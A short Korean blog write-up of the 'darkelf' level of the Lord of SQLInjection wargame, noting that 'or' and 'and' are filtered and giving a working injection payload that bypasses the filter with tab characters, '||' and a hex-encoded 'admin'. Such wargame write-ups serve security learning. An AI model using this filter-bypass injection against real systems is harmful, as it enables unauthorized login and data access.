본문 바로가기
Web/Wargame

[Lord of SQLInjection] darkelf

by sseddi 2021. 9. 27.
728x90

id가 admin이면 풀리는데 guest로 고정되어 있다.

그리고 preg_match로 or과 and 연산자가 필터링 되어 있다..

 

or과 and 연산자를 우회할 수 있는 방법이 또 뭐가 있을까???

?pw=0%27%09||%09id=0x61646d696e%23

 

728x90

'Web > Wargame' 카테고리의 다른 글

[Lord of SQLInjection] wolfman  (0) 2021.09.23
[Lord of SQLInjection] goblin  (0) 2021.09.22
[Lord of SQLInjection] cobolt  (0) 2021.09.22
[Lord of SQLInjection] gremlin  (0) 2021.09.22
[Lord of SQLInjection] orc  (0) 2021.09.22

댓글